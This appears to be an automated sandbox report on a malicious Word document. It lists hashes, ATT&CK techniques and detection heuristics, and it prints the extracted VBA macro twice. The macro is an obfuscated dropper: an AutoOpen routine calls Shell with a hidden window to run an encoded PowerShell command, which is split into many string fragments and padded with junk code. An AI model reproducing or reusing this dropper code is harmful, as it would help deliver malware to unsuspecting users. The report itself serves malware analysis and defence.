Office (OLE) malware analysis — malicious · 5839dfa1dfe2b374

MALICIOUS

Office (OLE)

106.0 KB Created: 2018-05-29 08:42:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 73afebeda7ee0aa0d925ed785c1a7252 SHA-1: 22b0ef9264db7c4f245e6223034b8811d54fc98d SHA-256: 5839dfa1dfe2b37425b2d9d1877d3d2e2c8867c900181a486e924252fc5e0cf6

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an Autoopen subroutine that calls the Shell function. This function is used to execute a PowerShell command, which is obfuscated but appears to be designed to download and execute a second-stage payload. The presence of the Autoopen macro and the Shell() call strongly indicate a malicious dropper.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6579427-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6579427-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14725 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14725 bytes
SHA-256: `681ae6fbe56cbc9b163061c835f988dd4a9afa216a0d7529fcb1b8e63c40451e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "TGpQjhmKuRiDMW" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function shDnvr() On Error Resume Next chJRpr = Fix(13280 / CSng(86170) * JbTls * CsCVKi) VhBn = CDate(53633) irHKDp = Fix(31717 / CSng(73873) * EjOBa * BEQjf) VhBn = CDate(27516) shDnvr = LLprEIj + oVVjmQcZTZT + JriuvwHa + OXKjOXpWiH + wTIZsbJiGnR + qMLFjDLY + jjYXPt rVisE = Fix(71551 / CSng(41257) * GRAiia * hCDoWL) VhBn = CDate(28920) End Function Sub Autoopen() On Error Resume Next dwcrA = Fix(31452 / CSng(88462) * wkEzmb * lfQWz) VhBn = CDate(35241) BjJpO (shDnvr) TvaTX = Fix(26730 / CSng(55814) * rOcTEv * tVdMSE) VhBn = CDate(95523) End Sub Function BjJpO(LTzRTSUss) On Error Resume Next awFrR = Fix(18046 / CSng(11098) * RjQdjQ * sjVGtq) VhBn = CDate(42895) vjjPuEinUt = josFouP + Shell(UbzITTBzu + Chr(vbKeyP) + wSPVilij + LTzRTSUss, vbHide) XPJlv = Fix(86006 / CSng(70942) * JVVAXR * LhlYL) VhBn = CDate(69279) End Function Attribute VB_Name = "RvdokjzzEjEdi" Function LLprEIj() On Error Resume Next tdJduZ = Fix(23218 / CSng(41058) * hBjFq * hamRv) VhBn = CDate(39378) UtzRz = "owersHeLL -WinD" + "owsTyle h" + "idden -" + "e JgAoACAA" + "JABlAG4AVgA" + "6AEMATw" + "BNAFMAUABFAEMAW" kHnta = Fix(6429 / CSng(67245) * HndCbt * TzUzMa) VhBn = CDate(82328) izMOPRTXU = "wA0ACw" + "AMgA0ACwAMgA1" + "AF0ALQBKAE8ASQ" + "BOACcAJwApACg" vrvDO = Fix(78446 / CSng(62020) * KGbtBq * wImKa) VhBn = CDate(27508) wWLKMzoHiB = "AIAAoACgAIgB7" + "ADEANwB9AHsA" + "NwA2AH0AewAxAD" + "AAMgB9AHs" DOMuG = Fix(75903 / CSng(94900) * HrtzrC * AUEbAS) VhBn = CDate(91373) IQCjArhXjP = "AMQAwADcAfQB" + "7ADcANwB9AHsA" + "MQAyADgAfQB7" + "ADMAOQB" + "9AHsAMQA" + "wADgAfQB7A" + "DEAMAAzAH" + "0AewA" + "xADEAOAB9AHsAOQ" + "B9AHsAMQAw" AlcwVo = Fix(50566 / CSng(30764) * trnjr * hspNz) VhBn = CDate(70545) aakkOojJIzi = "ADEAfQB7ADQAfQ" + "B7ADEAMQ" + "AxAH0Aew" + "AxAH0" + "AewA4" + "ADAAfQB7ADcAOA" BwwSIS = Fix(11264 / CSng(96956) * lHOMI * obIhbd) VhBn = CDate(12107) MBzcB = "B9AHsAN" + "wB9AHsANQ" + "A3AH0AewA4" + "ADgAfQB7ADEA" + "MAA1AH0" + "AewA0A" + "DUAfQB7AD" + "EAMwA1A" + "H0AewA1AD" OzIzW = Fix(67063 / CSng(20820) * wPAjd * CjIKS) VhBn = CDate(60926) ARoTM = "MAfQB7ADYAOQB9A" + "HsAMwB9AHsA" + "NAA3AH0AewA" + "yADIAf" + "QB7ADYAMQB9" + "AHsAMQAyADQAfQB" jRiLD = Fix(7347 / CSng(26972) * RJWvw * TzSjPD) VhBn = CDate(62111) HtLQXOW = "7ADAAfQ" + "B7ADcAMwB9AH" + "sAMwA1AH0Aew" + "AxADIAMwB9AHsA" zLYBo = Fix(47211 / CSng(54621) * RKati * inTfwz) VhBn = CDate(59466) GiASUu = "MQA4A" + "H0AewAz" + "ADIAf" + "QB7ADEAMwA" + "wAH0AewA5" + "ADgAfQB7AD" + "YAOAB9AHs" + "ANAA5AH0" + "AewAyADcAfQB7AD" + "UAOQB9AHsAMQA" LLprEIj = UtzRz + izMOPRTXU + wWLKMzoHiB + IQCjArhXjP + aakkOojJIzi + MBzcB + ARoTM + HtLQXOW + GiASUu End Function Function oVVjmQcZTZT() On Error Resume Next ioiRj = Fix(62365 / CSng(80050) * CcaUST * CPpcss) VhBn = CDate(22501) tqqodnfz = "yADcAfQB7ADcAN" + "QB9AHsAOQAyA" + "H0AewA" + "2AH0AewAxADA" + "AMAB9" + "AHsAMgAxAH" + "0AewAxAD" + "IAOQB9A" + "HsAOQA" + "wAH0Ae" FAmVi = Fix(31108 / CSng(70176) * jjthk * Xpvjq) VhBn = CDate(15248) rPnGiwtXXj = "wAxADMAOAB" + "9AHsAMwA2" + "AH0AewAxA" + "DIAMAB9AHsANQ" + "AwAH0AewA" + "4ADUAfQB7ADEAM" + "wAxAH0AewA4AH0" + "AewA5ADUAfQB7A" TNOLAR = Fix(30340 / CSng(14093) * mNSTZ * wKLKS) VhBn = CDate(42718) ciqDpDw = "DEAOQB9A" + "HsAMgA5AH0" + "AewAxADEANw" + "B9AHsAOAAzAH" + "0AewAzADcAf" + "QB7ADUA" + "fQB7A" + "DcAMgB9AHsA" + "OQA3AH" + "0AewAxADEANQB9A" oZlCfr = Fix(242 / CSng(62572) * CDWmm * KdzUz) VhBn = CDate(17025) pKcjQIJY = "HsAMQ" + "AxADQA" + "fQB7ADIANQB9AH" + "sANQA2AH0AewAx" + "ADEAMgB9A" + "HsAMQAzADI" + "AfQB7ADEAM" + "QB9AHsA" + "OAA3AH0Aew" jPRzGs = Fix(71149 / CSng(47518) * pbZZpZ * lXHqiL) VhBn = CDate(28276) YNmNrXCXFuz = "A2ADcAfQB7ADEAM" + "AA5AH0" + "AewA5A" + "DYAfQB7ADEAM" + "QA2AH" + "0AewA0ADEA" + "fQB7ADkAOQ" + "B ... (truncated)

SHA-256: 681ae6fbe56cbc9b163061c835f988dd4a9afa216a0d7529fcb1b8e63c40451e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "TGpQjhmKuRiDMW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function shDnvr()
On Error Resume Next
chJRpr = Fix(13280 / CSng(86170) * JbTls * CsCVKi)
VhBn = CDate(53633)
irHKDp = Fix(31717 / CSng(73873) * EjOBa * BEQjf)
VhBn = CDate(27516)
shDnvr = LLprEIj + oVVjmQcZTZT + JriuvwHa + OXKjOXpWiH + wTIZsbJiGnR + qMLFjDLY + jjYXPt
rVisE = Fix(71551 / CSng(41257) * GRAiia * hCDoWL)
VhBn = CDate(28920)
End Function
Sub Autoopen()
On Error Resume Next
dwcrA = Fix(31452 / CSng(88462) * wkEzmb * lfQWz)
VhBn = CDate(35241)
BjJpO (shDnvr)
TvaTX = Fix(26730 / CSng(55814) * rOcTEv * tVdMSE)
VhBn = CDate(95523)
End Sub
Function BjJpO(LTzRTSUss)
On Error Resume Next
awFrR = Fix(18046 / CSng(11098) * RjQdjQ * sjVGtq)
VhBn = CDate(42895)
vjjPuEinUt = josFouP + Shell(UbzITTBzu + Chr(vbKeyP) + wSPVilij + LTzRTSUss, vbHide)
XPJlv = Fix(86006 / CSng(70942) * JVVAXR * LhlYL)
VhBn = CDate(69279)
End Function


Attribute VB_Name = "RvdokjzzEjEdi"
Function LLprEIj()
On Error Resume Next
tdJduZ = Fix(23218 / CSng(41058) * hBjFq * hamRv)
VhBn = CDate(39378)
UtzRz = "owersHeLL -WinD" + "owsTyle h" + "idden -" + "e JgAoACAA" + "JABlAG4AVgA" + "6AEMATw" + "BNAFMAUABFAEMAW"
kHnta = Fix(6429 / CSng(67245) * HndCbt * TzUzMa)
VhBn = CDate(82328)
izMOPRTXU = "wA0ACw" + "AMgA0ACwAMgA1" + "AF0ALQBKAE8ASQ" + "BOACcAJwApACg"
vrvDO = Fix(78446 / CSng(62020) * KGbtBq * wImKa)
VhBn = CDate(27508)
wWLKMzoHiB = "AIAAoACgAIgB7" + "ADEANwB9AHsA" + "NwA2AH0AewAxAD" + "AAMgB9AHs"
DOMuG = Fix(75903 / CSng(94900) * HrtzrC * AUEbAS)
VhBn = CDate(91373)
IQCjArhXjP = "AMQAwADcAfQB" + "7ADcANwB9AHsA" + "MQAyADgAfQB7" + "ADMAOQB" + "9AHsAMQA" + "wADgAfQB7A" + "DEAMAAzAH" + "0AewA" + "xADEAOAB9AHsAOQ" + "B9AHsAMQAw"
AlcwVo = Fix(50566 / CSng(30764) * trnjr * hspNz)
VhBn = CDate(70545)
aakkOojJIzi = "ADEAfQB7ADQAfQ" + "B7ADEAMQ" + "AxAH0Aew" + "AxAH0" + "AewA4" + "ADAAfQB7ADcAOA"
BwwSIS = Fix(11264 / CSng(96956) * lHOMI * obIhbd)
VhBn = CDate(12107)
MBzcB = "B9AHsAN" + "wB9AHsANQ" + "A3AH0AewA4" + "ADgAfQB7ADEA" + "MAA1AH0" + "AewA0A" + "DUAfQB7AD" + "EAMwA1A" + "H0AewA1AD"
OzIzW = Fix(67063 / CSng(20820) * wPAjd * CjIKS)
VhBn = CDate(60926)
ARoTM = "MAfQB7ADYAOQB9A" + "HsAMwB9AHsA" + "NAA3AH0AewA" + "yADIAf" + "QB7ADYAMQB9" + "AHsAMQAyADQAfQB"
jRiLD = Fix(7347 / CSng(26972) * RJWvw * TzSjPD)
VhBn = CDate(62111)
HtLQXOW = "7ADAAfQ" + "B7ADcAMwB9AH" + "sAMwA1AH0Aew" + "AxADIAMwB9AHsA"
zLYBo = Fix(47211 / CSng(54621) * RKati * inTfwz)
VhBn = CDate(59466)
GiASUu = "MQA4A" + "H0AewAz" + "ADIAf" + "QB7ADEAMwA" + "wAH0AewA5" + "ADgAfQB7AD" + "YAOAB9AHs" + "ANAA5AH0" + "AewAyADcAfQB7AD" + "UAOQB9AHsAMQA"
LLprEIj = UtzRz + izMOPRTXU + wWLKMzoHiB + IQCjArhXjP + aakkOojJIzi + MBzcB + ARoTM + HtLQXOW + GiASUu
End Function
Function oVVjmQcZTZT()
On Error Resume Next
ioiRj = Fix(62365 / CSng(80050) * CcaUST * CPpcss)
VhBn = CDate(22501)
tqqodnfz = "yADcAfQB7ADcAN" + "QB9AHsAOQAyA" + "H0AewA" + "2AH0AewAxADA" + "AMAB9" + "AHsAMgAxAH" + "0AewAxAD" + "IAOQB9A" + "HsAOQA" + "wAH0Ae"
FAmVi = Fix(31108 / CSng(70176) * jjthk * Xpvjq)
VhBn = CDate(15248)
rPnGiwtXXj = "wAxADMAOAB" + "9AHsAMwA2" + "AH0AewAxA" + "DIAMAB9AHsANQ" + "AwAH0AewA" + "4ADUAfQB7ADEAM" + "wAxAH0AewA4AH0" + "AewA5ADUAfQB7A"
TNOLAR = Fix(30340 / CSng(14093) * mNSTZ * wKLKS)
VhBn = CDate(42718)
ciqDpDw = "DEAOQB9A" + "HsAMgA5AH0" + "AewAxADEANw" + "B9AHsAOAAzAH" + "0AewAzADcAf" + "QB7ADUA" + "fQB7A" + "DcAMgB9AHsA" + "OQA3AH" + "0AewAxADEANQB9A"
oZlCfr = Fix(242 / CSng(62572) * CDWmm * KdzUz)
VhBn = CDate(17025)
pKcjQIJY = "HsAMQ" + "AxADQA" + "fQB7ADIANQB9AH" + "sANQA2AH0AewAx" + "ADEAMgB9A" + "HsAMQAzADI" + "AfQB7ADEAM" + "QB9AHsA" + "OAA3AH0Aew"
jPRzGs = Fix(71149 / CSng(47518) * pbZZpZ * lXHqiL)
VhBn = CDate(28276)
YNmNrXCXFuz = "A2ADcAfQB7ADEAM" + "AA5AH0" + "AewA5A" + "DYAfQB7ADEAM" + "QA2AH" + "0AewA0ADEA" + "fQB7ADkAOQ" + "B
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.